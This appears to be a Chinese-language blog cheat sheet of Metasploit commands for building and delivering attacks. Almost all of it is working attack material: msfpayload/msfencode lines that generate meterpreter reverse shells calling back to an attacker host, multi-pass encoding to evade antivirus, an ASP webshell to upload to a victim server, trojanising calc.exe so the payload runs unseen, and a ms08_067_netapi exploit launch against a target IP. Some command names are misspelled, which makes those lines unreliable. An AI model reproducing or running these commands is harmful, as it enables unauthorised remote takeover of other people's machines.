MSF常用的监听模块命令

msfpayload 命令


  帮助

msfpayload -h

  列出所有可用的攻击载荷  

msfpayload windows/meterpreter/bind_tcp O

  列出所有windows/meterpreter/bind_tcp 下攻击载荷的配置项(任何攻击载荷都是可以配置的)

msfpayload windows/meterpreter/bind_tcp O.

  创建一个meterperter的reverse_tcp攻击载荷,回连到your ip的端口,将其保存为名为payload.exe的windows可执行程序

msfpayload windows/meterpreter/reverse_tcp LHOST=your ip LPORT=port X > payload.exe

  与上生成同样的攻击载荷,导出成原始格式文件,该文件将后面的MSFencode中使用

msfpayload windows/meterpreter/reverse_tcp LHOST=your ip LPORT=port R > payload.raw

  与上面生成同样的攻击载荷,但导出成C格式的shellcode

msfpayload windows/meterpreter/bind_tcp LPORT=port C > payload.c

  导出成以%U编码方式的javascript语言字符串

msfpayload windows/meterpreter/bind_tcp LPORT=port J > payload.java

  产生webshell将此webshell上传到服务器,这个步骤要有上传权限

msfpayload windows/meterpreter/reverse_tcp LHOST=your_ip | msfencode -t asp -o webshell.asp

  启动msfconsole 输入:

use exploits/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST your_ip
exploit


msfencode 命令


   帮助

msfencode -h

  列出所有可用的编码器

msfencode -l

  显示编码缓冲区的格式

msfencode -t (c,elf,java,js_Le,js_be,perl,raw,ruby,vba,vbs,loop-vbs,asp,war,macho)

  使用shikata_ga_nai编码器对payload.raw文件进行5次编码,然后导出一个名为encoded_payload.exe的文件

msfencode -i payload.raw -o encoded_payload.exe -e x86/shikata_ga_nai -c 5 -t exe

  创建一个经过多种编码格式的嵌套编码的攻击载荷

msfpayload windows/meterpreter/bind_tcp LPORT=port R | msfencode -e x86/_countdown -c 5 -t raw | msfencode -e x86/shikata_ga_nai -c 5 -t exe -o multi-encoded_payload.exe

  创建一个纯字母数字的shellcode,由ESI寄存器指向shellcode,以C语言格式输出

msfencode -i payload.raw BufferRegister=ESI -e x86/alpha_mixed -t c


msfcli命令


仅列出渗透攻击模块

msfcli|grep exploit

仅列出与windows相关的渗透攻击模块

msfcli|grep exploit/windows

对对方IP发起ms08_067_natapi渗透攻击,配置bind_tcp攻击载荷,并绑定在443端口进行监听

msfcli exploit/windows/smb/ms08_067_netapi PAYLOAD=windows/meterpreter/bind_ctp LPORT=443 RHOST=对方IP E


metasploit高级忍术


 创建一个反弹式的meterpreter攻击载荷,回连到192.168.1.1主机的443端口,使用calc.exe作为载苛后门程序,让载荷执行流一直运行在被攻击的应用程序中,最后生成以.shikata_ga_nai编码器编码后的攻击载荷可执行程序payload.exe

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=443 R | msfencode -x calc.exe -k -o payload.exe -e x86/skikata_ga_nai -c 7 -t exe

创建一个反弹式的meterpreter攻击载荷,回连到192.168.1.1主机的443端口,使用calc.exe作为载苛后门程序,不让载荷执行流一直运行在被攻击的应用程序中,同时在攻击载荷执行后也不会在目标主机上弹出任何信息,这种配置非常有用,当你通过浏览器漏洞控制了远程主机,并不想让计算器程序打开呈现在目标用户面前。同样,最后生成用.shikata_ga_nai编码器的攻击载荷可执行程序payload.exe

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=443 R | msfencode -x calc.exe -o payload.exe -e x86/skikata_ga_nai -c 7 -t exe

创建一个raw格式的bind_tcp模式meterpreter攻击载荷,用.shikata_ga_nai编码7次,输出以payload.exe命名的windows可执行程序文件,同时启用多路监听方式进行执行

msfpayload windows/meterpreter/bind_tcp LHOST=192.168.1.1 LPORT=443 R | msfencode -o payload.exe -e x86/shikata_ga_nai -c 7 -t exe && msfcli multi/handler PAYLOAD=windows/meterpreter/bind_tcp LPORT=443 E


你可能感兴趣的:(windows,程序)